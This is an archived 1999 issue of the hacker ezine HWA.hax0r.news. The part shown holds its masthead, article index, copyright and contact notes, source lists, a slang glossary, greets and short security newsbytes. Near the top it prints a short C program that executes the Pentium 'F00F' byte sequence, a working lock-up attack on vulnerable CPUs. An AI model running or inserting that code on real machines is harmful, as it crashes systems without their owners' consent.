💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › HWA › hwa-hn28.… captured on 2021-12-03 at 14:04:38.

-=-=-=-=-=-=-

    [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
  ==========================================================================
  =                       <=-[ HWA.hax0r.news ]-=>                         =
  ==========================================================================
    [=HWA'99=]                         Number 28 Volume 1 1999 Aug 7th  99
  ==========================================================================
    [                     61:20:6B:69:64:20:63:6F:75:                    ]
    [               6C:64:20:62:72:65:61:6B:20:74:68:69:73:              ]
    [              20:22:65:6E:63:72:79:70:74:69:6F:6E:22:!              ]        
  ==========================================================================


  Like all religions, the Holy Religion of the Invisible Pink Unicorn is based
  upon both Logic and Faith. We have Faith that She is Pink; and we Logically 
  know that She is Invisible, because we can't see Her. 
              
               -   http://www.ozemail.com.au/~ksolway/athquot.html
             


     */
     
     
     char x [5] = { 0xf0, 0x0f, 0xc7, 0xc8 };
     
     main ()
     {
            void (*f)() = x;
     
            f();
     }

    
     New mirror site :http://www.ducktank.net/hwa/issues.html.
 


     HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
     and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth
     and airportman for the Cubesoft bandwidth. Also shouts out to all our
     mirror sites! tnx guys. 
     
     http://www.csoft.net/~hwa
     http://www.digitalgeeks.com/hwa

     
     HWA.hax0r.news Mirror Sites:
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~
     http://www.ducktank.net/hwa/issues.html. ** NEW **
     http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
     http://www.csoft.net/~hwa/ 
     http://www.digitalgeeks.com/hwa.
     http://members.tripod.com/~hwa_2k
     http://welcome.to/HWA.hax0r.news/
     http://www.attrition.org/~modify/texts/zines/HWA/
     http://archives.projectgamma.com/zines/hwa/.  
     http://www.403-security.org/Htmls/hwa.hax0r.news.htm

   
   
        For many, faith is a suitable substitute for knowledge,
                   as death is for a difficult life. 
            
     
        
  
   SYNOPSIS (READ THIS)
   --------------------
   
   The purpose of this newsletter is to 'digest' current events of interest
   that affect the online underground and netizens in general. This includes
   coverage of general security issues, hacks, exploits, underground news
   and anything else I think is worthy of a look see. (remember i'm doing
   this for me, not you, the fact some people happen to get a kick/use
   out of it is of secondary importance).

    This list is NOT meant as a replacement for, nor to compete with, the
   likes of publications such as CuD or PHRACK or with news sites such as
   AntiOnline, the Hacker News Network (HNN) or mailing lists such as
   BUGTRAQ or ISN nor could any other 'digest' of this type do so.

    It *is* intended, however, to complement such material and provide a
   reference to those who follow the culture by keeping tabs on as many
   sources as possible and providing links to further info, its a labour
   of love and will be continued for as long as I feel like it, i'm not
   motivated by dollars or the illusion of fame, did you ever notice how
   the most famous/infamous hackers are the ones that get caught? there's
   a lot to be said for remaining just outside the circle... <g>
   
   

   @HWA

   =-----------------------------------------------------------------------=

                     Welcome to HWA.hax0r.news ... #28

   =-----------------------------------------------------------------------=


    
    We could use some more people joining the channel, its usually pretty
    quiet, we don't bite (usually) so if you're hanging out on irc stop
    by and idle a while and say hi...   

    *******************************************************************
    ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
    ***                                                             ***
    *** please join to discuss or impart news on techno/phac scene  ***
    *** stuff or just to hang out ... someone is usually around 24/7***
    ***                                                             ***
    *** Note that the channel isn't there to entertain you its for  ***
    *** you to talk to us and impart news, if you're looking for fun***
    *** then do NOT join our channel try #weirdwigs or something... ***
    *** we're not #chatzone or #hack                                ***
    ***                                                             ***
    *******************************************************************


  =-------------------------------------------------------------------------=
  
  Issue #28

  =--------------------------------------------------------------------------=
  [ INDEX ]
  =--------------------------------------------------------------------------=
    Key     Intros                                                         
  =--------------------------------------------------------------------------=
 
    00.0  .. COPYRIGHTS ......................................................
    00.1  .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
    00.2  .. SOURCES .........................................................
    00.3  .. THIS IS WHO WE ARE ..............................................
    00.4  .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
    00.5  .. THE HWA_FAQ V1.0 ................................................

  =--------------------------------------------------------------------------=
    Key     Content 
  =--------------------------------------------------------------------------=

    01.0  .. GREETS ..........................................................
     01.1 .. Last minute stuff, rumours, newsbytes ...........................
     01.2 .. Mailbag .........................................................
    02.0  .. From the Editor.................................................. 
    03.0  .. Debunking the debunked by route..................................
    04.0  .. DefCon 7 by AgentX...............................................
    05.0  .. Hacking Faq by ben-z 5/14/99.....................................
    06.0  .. Group approves controversial software law .......................
    07.0  .. Falun Gong Web Sites Attacked by China? .........................
    08.0  .. Super Computer Almost Gets Away .................................
    09.0  .. Symantec's website hacked........................................
    10.0  .. New virus due to hit town "New virus spills your beans " - BBC...
    11.0  .. New York Times Debunked - FIDNet Moves Ahead as Planned .........
    12.0  .. Computer `crackers' set sights on .gov for chaos.................
    13.0  .. IIS Server 'hackproof'? .........................................
    14.0  .. Latest CWD Pokes at AntiOnline ..................................
    15.0  .. High Profile Sites Defaced ......................................
    16.0  .. Off The Hook Goes Shortwave .....................................
    17.0  .. Feds Stop Satellite Biz due to WireTaps .........................
    18.0  .. InfoCriminals Should Face Reasonable Penalties ..................
    19.0  .. L0pht Professional Plugin Pack For BO2K .........................
    20.0  .. MS Wants Free Publicity?.........................................
    20.1  .. MS: a crashed site is hard to hack!..............................      
    21.0  .. China Seeks to Develop Infowar Capabilities .....................
    22.0  .. Online Banking Still Risky Congress Says ........................
    23.0  .. NIPRNet Access Restricted .......................................
    24.0  .. Gov Employees Personal Privacy at Risk ..........................
    25.0  .. Other Security Challenges Offered ...............................
    25.1  .. Software developer offers hacker challenge.......................
    26.0  .. CCC Camp About to Get Under Way .................................
    27.0  .. Hackers... Those Who Would Be Gods ..............................
    28.0  .. European Crypto Mailing List ....................................
    29.0  .. "Ya Wanna Be Hackers, Code Crackers, or just AOL Chat Room Yackers?" 
    30.0  .. WHO DO YOU WANT TO BE TODAY?.....................................
    31.0  .. NAI GROUPSHIELD FOR EXCHANGE BUG.................................
    32.0  .. How the blackhats work...........................................
    33.0  .. ADMINS ASLEEP ON WATCH?..........................................
    34.0  .. THEFT HURTS THE WELL.............................................
    35.0  .. MICROSOFT SECURITY FLAWS.........................................
    36.0  .. CHINESE CYBER WARRIORS...........................................
    37.0  .. MICROSOFT AND SECURITY (AGAIN)...................................
    38.0  .. THE ENEMY WITHIN.................................................
    39.0  .. DRUNKEN HACKERS ON JERRY SPRINGER................................
    40.0  .. DATA PROTECTION NOT TO BE IGNORED................................
    41.0  .. WIRELESS ENCRYPTION HANDHELDS....................................
    42.0  .. Y2K TO AID IN CYBERDEFENSE.......................................
    43.0  .. BUGTRAQ:Yet Another ODBC Bugged ASP Sample Page..................
    44.0  .. New mailing lists offered by www.securityfocus.com...............
    45.0  .. Beyond Virtual Vaccinations......................................
    46.0  .. Forgot your password? Try 'way2many'    .........................
    47.0  .. A Former Network Administrator Faces Felony Charges in Hacker-Site Case
    48.0  .. Kevin's life now, and happy birthday Kevin.......................
    49.0  .. Cybercrime up 43%................................................ 
    50.0  .. Canada Can't Keep Up With CyberCrime ............................
    51.0  .. Germans hold bank liable for using 56 bit encryption.............
    52.0  .. GPS Date Rollover on Aug 22 .....................................
    53.0  .. NY Police Face Possible Copyright Violations ....................
    54.0  .. Chaos Computer Club: Happy Hacker Campers........................
    55.0  .. Hackers and Cyberwar "The Threat of Chaos "     .................
    56.0  .. Lockdown 2000....................................................
    57.0  .. The SMURF attack and smurf amplifiers............................
    =--------------------------------------------------------------------------=   
    
    AD.S  .. Post your site ads or etc here, if you can offer something in return
             thats tres cool, if not we'll consider ur ad anyways so send it in.
             ads for other zines are ok too btw just mention us in yours, please
             remember to include links and an email contact. Corporate ads will
             be considered also and if your company wishes to donate to or 
             participate in the upcoming Canc0n99 event send in your suggestions
             and ads now...n.b date and time may be pushed back join mailing list
             for up to date information.......................................
             Current dates: Aug19th-22nd Niagara Falls...    .................
    Ha.Ha .. Humour and puzzles  ............................................
              
              Hey You!........................................................
              =------=........................................................
              
              Send in humour for this section! I need a laugh and its hard to
              find good stuff... ;)...........................................

    SITE.1 .. Featured site, .................................................
     H.W   .. Hacked Websites  ...............................................
     A.0   .. APPENDICES......................................................
     A.1   .. PHACVW linx and references......................................
 
  =--------------------------------------------------------------------------=
     
     @HWA'99

     
 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

          THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
          OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
          WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
          (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
          READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
     
          Important semi-legalese and license to redistribute:
     
          YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
          AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
          ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
          IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
          APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
          IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
          ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
          ME PRIVATELY current email cruciphux@dok.org
     
          THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
          WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
          THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
     
          I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
          AND REDISTRIBUTE/MIRROR. - EoD
     
     
          Although this file and all future issues are now copyright, some of
         the content holds its  own copyright and these are printed and
         respected. News is news so i'll print any and all news but will quote
         sources when the source is known, if its good enough for CNN its good
         enough for me. And i'm doing it for free on my own time so pfffft. :)
     
         No monies are made or sought through the distribution of this material.
         If you have a problem or concern email me and we'll discuss it.
     
         cruciphux@dok.org
     
         Cruciphux [C*:.]



 00.1 CONTACT INFORMATION AND MAIL DROP
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


     Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
    Canada / North America (hell even if you are inside ..) and wish to
    send printed matter like newspaper clippings a subscription to your
    cool foreign hacking zine or photos, small non-explosive packages
    or sensitive information etc etc well, now you can. (w00t) please
    no more inflatable sheep or plastic dog droppings, or fake vomit
    thanks.

    Send all goodies to:

	    HWA NEWS
	    P.O BOX 44118
	    370 MAIN ST. NORTH
	    BRAMPTON, ONTARIO
	    CANADA
	    L6V 4H5

    WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
    ~~~~~~~  reading this from some interesting places, make my day and get a
             mention in the zine, send in a postcard, I realize that some places
             it is cost prohibitive but if you have the time and money be a cool
             dude / gal and send a poor guy a postcard preferably one that has some
             scenery from your place of residence for my collection, I collect stamps
             too so you kill two birds with one stone by being cool and mailing in a
             postcard, return address not necessary, just a  "hey guys being cool in
             Bahrain, take it easy" will do ... ;-) thanx.



    Ideas for interesting 'stuff' to send in apart from news:

    - Photo copies of old system manual front pages (optionally signed by you) ;-)
    - Photos of yourself, your mom, sister, dog and or cat in a NON
      compromising position plz I don't want pr0n. <g>
    - Picture postcards
    - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
      tapes with hack/security related archives, logs, irc logs etc on em.
    - audio or video cassettes of yourself/others etc of interesting phone
      fun or social engineering examples or transcripts thereof.
    
    
    Stuff you can email:
    
    - Prank phone calls in .ram or .mp* format
    - Fone tones and security announcements from PBX's etc
    - fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities)
    - reserved for one smiley face ->        :-)            <-
    - PHACV lists of files that you have or phac cd's you own (we have a burner, *g*)
    - burns of phac cds (email first to make sure we don't already have em)
    - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp*
    

    If you still can't think of anything you're probably not that interesting
    a person after all so don't worry about it <BeG>

    Our current email:

    Submissions/zine gossip.....: hwa@press.usmc.net
    Private email to editor.....: cruciphux@dok.org
    Distribution/Website........: sas72@usa.net

    @HWA



 00.2 Sources ***
      ~~~~~~~~~~~

     Sources can be some, all, or none of the following (by no means complete
    nor listed in any degree of importance) Unless otherwise noted, like msgs
    from lists or news from other sites, articles and information is compiled
    and or sourced by Cruciphux no copyright claimed.

    News & I/O zine ................. http://www.antionline.com/
    Back Orifice/cDc..................http://www.cultdeadcow.com/
    News site (HNN) ..................http://www.hackernews.com/
    Help Net Security.................http://net-security.org/
    News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
    NewsTrolls .(daily news ).........http://www.newstrolls.com/
    News + Exploit archive ...........http://www.rootshell.com/beta/news.html
    CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
    News site+........................http://www.zdnet.com/
    News site+Security................http://www.gammaforce.org/
    News site+Security................http://www.projectgamma.com/
    News site+Security................http://securityhole.8m.com/
    News site+Security related site...http://www.403-security.org/  *DOWN*
    News/Humour site+ ................http://www.innerpulse.com
    News/Techie news site.............http://www.slashdot.org
    
    

    +Various mailing lists and some newsgroups, such as ...
    +other sites available on the HNN affiliates page, please see
     http://www.hackernews.com/affiliates.html as they seem to be popping up
     rather frequently ...

    
    http://www.the-project.org/ .. IRC list/admin archives
    http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk

    alt.hackers.malicious
    alt.hackers
    alt.2600
    BUGTRAQ
    ISN security mailing list
    ntbugtraq
    <+others>

    NEWS Agencies, News search engines etc:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    http://www.cnn.com/SEARCH/
       
    http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
        
    http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
        
    http://www.ottawacitizen.com/business/
        
    http://search.yahoo.com.sg/search/news_sg?p=hack
        
    http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
        
    http://www.zdnet.com/zdtv/cybercrime/
        
    http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
        
    NOTE: See appendices for details on other links.
    


    http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
        
    http://freespeech.org/eua/ Electronic Underground Affiliation
        
    http://ech0.cjb.net ech0 Security
    
    http://axon.jccc.net/hir/ Hackers Information Report
        
    http://net-security.org Net Security
        
    http://www.403-security.org Daily news and security related site
        

    Submissions/Hints/Tips/Etc
    ~~~~~~~~~~~~~~~~~~~~~~~~~~

    All submissions that are `published' are printed with the credits
    you provide, if no response is received by a week or two it is assumed
    that you don't care whether the article/email is to be used in an issue
    or not and may be used at my discretion.

    Looking for:

    Good news sites that are not already listed here OR on the HNN affiliates
    page at http://www.hackernews.com/affiliates.html

    Magazines (complete or just the articles) of breaking sekurity or hacker
    activity in your region, this includes telephone phraud and any other
    technological use, abuse hole or cool thingy. ;-) cut em out and send it
    to the drop box.


    - Ed

    Mailing List Subscription Info   (Far from complete)         Feb 1999
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~

    ISS Security mailing list faq : http://www.iss.net/iss/maillist.html


    THE MOST READ:

    BUGTRAQ - Subscription info
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~

    What is Bugtraq?

    Bugtraq is a full-disclosure UNIX security mailing list, (see the info
    file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
    bugtraq, send mail to listserv@netspace.org containing the message body
    subscribe bugtraq. I've been archiving this list on the web since late
    1993. It is searchable with glimpse and archived on-the-fly with hypermail.

    Searchable Hypermail Index;

          http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html


    About the Bugtraq mailing list
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    The following comes from Bugtraq's info file:

    This list is for *detailed* discussion of UNIX security holes: what they are,
    how to exploit, and what to do to fix them.

    This list is not intended to be about cracking systems or exploiting their
    vulnerabilities. It is about defining, recognizing, and preventing use of
    security holes and risks.

    Please refrain from posting one-line messages or messages that do not contain
    any substance that can relate to this list`s charter.

    I will allow certain informational posts regarding updates to security tools,
    documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
    on this list.

    Please follow the below guidelines on what kind of information should be posted
    to the Bugtraq list:

    + Information on Unix related security holes/backdoors (past and present)
    + Exploit programs, scripts or detailed processes about the above
    + Patches, workarounds, fixes
    + Announcements, advisories or warnings
    + Ideas, future plans or current works dealing with Unix security
    + Information material regarding vendor contacts and procedures
    + Individual experiences in dealing with above vendors or security organizations
    + Incident advisories or informational reporting

    Any non-essential replies should not be directed to the list but to the
    originator of the message. Please do not "CC" the bugtraq reflector
    address if the response does not meet the above criteria.

    Remember: YOYOW.

    You own your own words. This means that you are responsible for the words
    that you post on this list and that reproduction of those words without
    your permission in any medium outside the distribution of this list may be
    challenged by you, the author.

    For questions or comments, please mail me:
    chasin@crimelab.com (Scott Chasin)


    
    Crypto-Gram
    ~~~~~~~~~~~

       CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
      insights, and commentaries on cryptography and computer security.

      To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
      blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe,
      visit http://www.counterpane.com/unsubform.html.  Back issues are available
      on http://www.counterpane.com.

       CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of
      Counterpane Systems, the author of "Applied Cryptography," and an inventor
      of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of
      the International Association for Cryptologic Research, EPIC, and VTW.  He
      is a frequent writer and lecturer on cryptography.


    CUD Computer Underground Digest
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    This info directly from their latest ish:

    Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09

                         ISSN  1004-042X

          Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
          News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
          Archivist: Brendan Kehoe
          Poof Reader:   Etaion Shrdlu, Jr.
          Shadow-Archivists: Dan Carosone / Paul Southworth
                             Ralph Sims / Jyrki Kuoppala
                             Ian Dickinson
          Cu Digest Homepage: http://www.soci.niu.edu/~cudigest



    [ISN] Security list
    ~~~~~~~~~~~~~~~~~~~
    This is a low volume list with lots of informative articles, if I had my
    way i'd reproduce them ALL here, well almost all .... ;-) - Ed


    Subscribe: mail majordomo@repsec.com with "subscribe isn".



    @HWA


 00.3 THIS IS WHO WE ARE
      ~~~~~~~~~~~~~~~~~~
 
      Some HWA members and Legacy staff
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      cruciphux@dok.org.........: currently active/editorial
      darkshadez@ThePentagon.com: currently active/man in black
      fprophet@dok.org..........: currently active/IRC+ man in black
      sas72@usa.net ............: currently active/IRC+ distribution
      vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
      dicentra...(email withheld): IRC+ grrl in black
      eentity ...( ''      ''   ): Currently active/IRC+ man in black


      Foreign Correspondents/affiliate members
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
       Qubik ............................: United Kingdom 
       D----Y ...........................: USA/world media
       HWA members ......................: World Media
       
      
      
      Past Foreign Correspondents (currently inactive or presumed dead) 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       N0Portz ..........................: Australia           
       system error .....................: Indonesia           
       Wile (wile coyote) ...............: Japan/the East      
       Ruffneck  ........................: Netherlands/Holland 

       
       Please send in your sites for inclusion here if you haven't already
       also if you want your emails listed send me a note ... - Ed

      Spikeman's site is down as of this writing, if it comes back online it will be
      posted here.
      http://www.hackerlink.or.id/  ............ System Error's site (in Indonesian) 
       

       *******************************************************************
       ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
       *******************************************************************

    :-p


    1. We do NOT work for the government in any shape or form. Unless you count paying
       taxes ... in which case we work for the gov't in a BIG WAY. :-/

    2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
       events its a good idea to check out issue #1 at least and possibly also the
       Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...


    @HWA



 00.4 Whats in a name? why HWA.hax0r.news??
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                             
      
      Well what does HWA stand for? never mind if you ever find out I may
     have to get those hax0rs from 'Hackers' or the Pretorians after you.

     In case you couldn't figure it out hax0r is "new skewl" and although
     it is laughed at, shunned, or even pigeonholed with those 'dumb
     leet (l33t?) dewds' <see article in issue #4> this is the state
     of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
     up  and comers, i'd highly recommend you get that book. Its almost
     like  buying a clue. Anyway..on with the show .. - Editorial staff


     @HWA

00.5  HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Also released in issue #3. (revised) check that issue for the faq
    it won't be reprinted unless changed in a big way with the exception
    of the following excerpt from the FAQ, included to assist first time
    readers:

    Some of the stuff related to personal usage and use in this zine are
    listed below: Some are very useful, others attempt to deny any possible
    attempts at eschewing obfuscation by obscuring their actual definitions.

    @HWA   - see EoA  ;-)

    !=     - Mathematical notation "is not equal to" or "does not equal"
             ASC(247)  "wavey equals" sign means "almost equal" to. If written
             an =/= (equals sign with a slash thru it) also means !=, =< is Equal
             to or less than and =>  is equal to or greater than (etc, this aint
             fucking grade school, cripes, don't believe I just typed all that..)

    AAM    - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

    AOL    - A great deal of people that got ripped off for net access by a huge
             clueless isp with sekurity that you can drive buses through, we're
             not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
             least they could try leasing one??

   *CC     - 1 - Credit Card (as in phraud)
             2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

    CCC    - Chaos Computer Club (Germany)

   *CON    - Conference, a place hackers crackers and hax0rs among others go to swap
             ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
             watch videos and seminars, get drunk, listen to speakers, and last but
             not least, get drunk.
   *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
                 speak he's the guy that breaks into systems and is often (but by no
                 means always) a "script kiddie" see pheer
              2 . An edible biscuit usually crappy tasting without a nice dip, I like
                  jalapeno pepper dip or chives sour cream and onion, yum - Ed

    Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
              Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
              ebonics, speaking in a dark tongue ... being ereet, see pheer

    EoC    - End of Commentary

    EoA    - End of Article or more commonly @HWA

    EoF    - End of file

    EoD    - End of diatribe (AOL'ers: look it up)

    FUD    - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
            usually in general media articles not high brow articles such as ours or other
            HNN affiliates ;)

    du0d   - a small furry animal that scurries over keyboards causing people to type
             weird crap on irc, hence when someone says something stupid or off topic
             'du0d wtf are you talkin about' may be used.

   *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

   *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
            define, I think it is best defined as pop culture's view on The Hacker ala
            movies such as well erhm "Hackers" and The Net etc... usually used by "real"
            hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
            some coffee?' or 'can you hax0r some bread on the way to the table please?'

            2 - A tool for cutting sheet metal.

    HHN    - Maybe a bit confusing with HNN but we did spring to life around the same
             time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
             noun means the hackernews site proper. k? k. ;&

    HNN    - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

    J00    - "you"(as in j00 are OWN3D du0d) - see 0wn3d

    MFI/MOI- Missing on/from IRC

    NFC   - Depends on context: No Further Comment or No Fucking Comment

    NFR   - Network Flight Recorder (Do a websearch) see 0wn3d

    NFW   - No fuckin'way

   *0WN3D - You are cracked and owned by an elite entity see pheer
   *OFCS  - Oh for christ's sakes

    PHACV - And variations of same <coff>
            Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare

          Alternates: H - hacking, hacktivist
                      C - Cracking <software>
                      C - Cracking <systems hacking>
                      V - Virus
                      W - Warfare <cyberwarfare usually as in Jihad>
                      A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                      P - Phreaking, "telephone hacking" PHone fREAKs ...
                     CT - Cyber Terrorism

   *PHEER -  This is what you do when an ereet or elite person is in your presence
            see 0wn3d

   *RTFM  - Read the fucking manual - not always applicable since some manuals are
            pure shit but if the answer you seek is indeed in the manual then you
            should have RTFM you dumb ass.

    TBC   - To Be Continued also 2bc (usually followed by ellipses...) :^0

    TBA   - To Be Arranged/To Be Announced also 2ba

    TFS   - Tough fucking shit.

   *w00t  - 1 - Reserved for the uber ereet, no one can say this without severe repercussions
            from the underground masses. also "w00ten" <sic>

            2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

    *wtf  - what the fuck, where the fuck, when the fuck etc ..

    *ZEN  - The state you reach when you *think* you know everything (but really don't)
            usually shortly after reaching the ZEN like state something will break that
            you just 'fixed' or tweaked.
            
     @HWA            
     
     
                            -=-    :.    .:        -=-
                            
                            
                            

 01.0 Greets!?!?! yeah greets! w0w huh. - Ed
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Thanks to all in the community for their support and interest but i'd
     like to see more reader input, help me out here, whats good, what sucks
     etc, not that I guarantee i'll take any notice mind you, but send in
     your thoughts anyway.


       * all the people who sent in cool emails and support
       
     FProphet       Pyra                TwstdPair      _NeM_
     D----Y         Dicentra            vexxation      sAs72
     Spikeman       p0lix           
     
          
     Ken Williams/tattooman of PacketStorm, hang in there Ken...:(
          
     & Kevin Mitnick (Happy Birthday)                              
     
     kewl sites:

     + http://www.securityportal.com/ NEW
     + http://www.securityfocus.com/ NEW
     + http://www.hackcanada.com/
     + http://www.l0pht.com/
     + http://www.2600.com/
     + http://www.freekevin.com/
     + http://www.genocide2600.com/
     + http://www.packetstorm.harvard.edu/    ******* DOWN (THANKS JP) ******
     + http://www.hackernews.com/ (Went online same time we started issue 1!)
     + http://www.net-security.org/
     + http://www.slashdot.org/
     + http://www.freshmeat.net/
     + http://www.403-security.org/
     + http://ech0.cjb.net/

     @HWA


 01.1 Last minute stuff, rumours and newsbytes
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

       "What is popular isn't always right, and what is right isn't
         always popular..."
                           - FProphet '99
                           
       

    +++ When was the last time you backed up your important data?
     
     
     ++  SOPHOS WITH OXFAM
         From www.net-security.org/
         
         by BHZ, Thursday 5th August 1999 on 1:58 pm CET
         Oxfam (www.oxfam.org), Britain's largest overseas aid charity, which employs over
         250000 people, evaluated all anti-virus products on the market and chose Sophos
         (www.sophos.com) for securing their WANs, servers, workstations and laptops of
         viruses. 
 
 
     ++ MICROSOFT STILL WORKING
        From www.net-security.org/
        
        by BHZ, Thursday 5th August 1999 on 1:49 pm CET
        Microsoft is still trying to patch a bug in Office97, that we reported about earlier.
        Microsoft's group product manager for Office said: "Right now we are thoroughly
        testing the solution, We take all security issues seriously. To date, we have not
        heard from any customers on the issue".     
     
     
     ++ Y2K IN SCHOOL SYSTEMS
        From www.net-security.org/
        
        by BHZ, Thursday 5th August 1999 on 1:25 pm CET
        New draft about Y2K problem in schools and universities, says some very disturbing
        news - less than one third of all school institutions reported that they are Y2K
        compliant. Draft concludes that: "a troubling number of institutions, especially in the
        elementary/secondary area, have not yet completed their assessment of systems
        and are lagging in remediation and testing." 
     
     
     ++ JAPAN WILL HALT TRAINS
        From www.net-security.org/
     
        by BHZ, Thursday 5th August 1999 on 1:53 pm CET
        Spokesman from East Japan Railway Co., Japan's largest rail company said that
        they will halt all trains on the last day of this millennium. It will last just for a couple of
        minutes - last minutes of 1999 and several minutes in the year 2000. This will all be
        done as a precaution against possible Y2K errors. 
     
     
     ++ OUTDOOR GEEKS MAY VANISH SOON (TECH. 3:00 am)
        http://www.wired.com/news/news/email/explode-infobeat/technology/story/21098.html

        Weekend warriors take to the oceans, forests, rivers, and
        skies this month, and they'll get back home with the help of
        GPS. Unless the gear crashes. By James Glave.
        
     ++ DROP OUT AND CASH IN (BUS. 9:00 am)
        http://www.wired.com/news/news/email/explode-infobeat/business/story/21116.html

        Score one more for the geeks who drop out of school. A
        21-year-old from Dallas sells his hardware review Web site
        to EarthWeb for millions. By Chris Gaither.
        
     ++ Y2K CZAR: FEDS IN GOOD SHAPE (BUS. 9:00 am)
        http://www.wired.com/news/news/email/explode-infobeat/business/story/21114.html


        In his quarterly report, John Koskinen says things look good
        at a national level, but some local systems are iffy. Also:
        Warner Bros. pushes Iron Giant on the Web.... AOL, BigE in
        Latin American deal.... Everyone wants a robodog....
        And more.
   
   
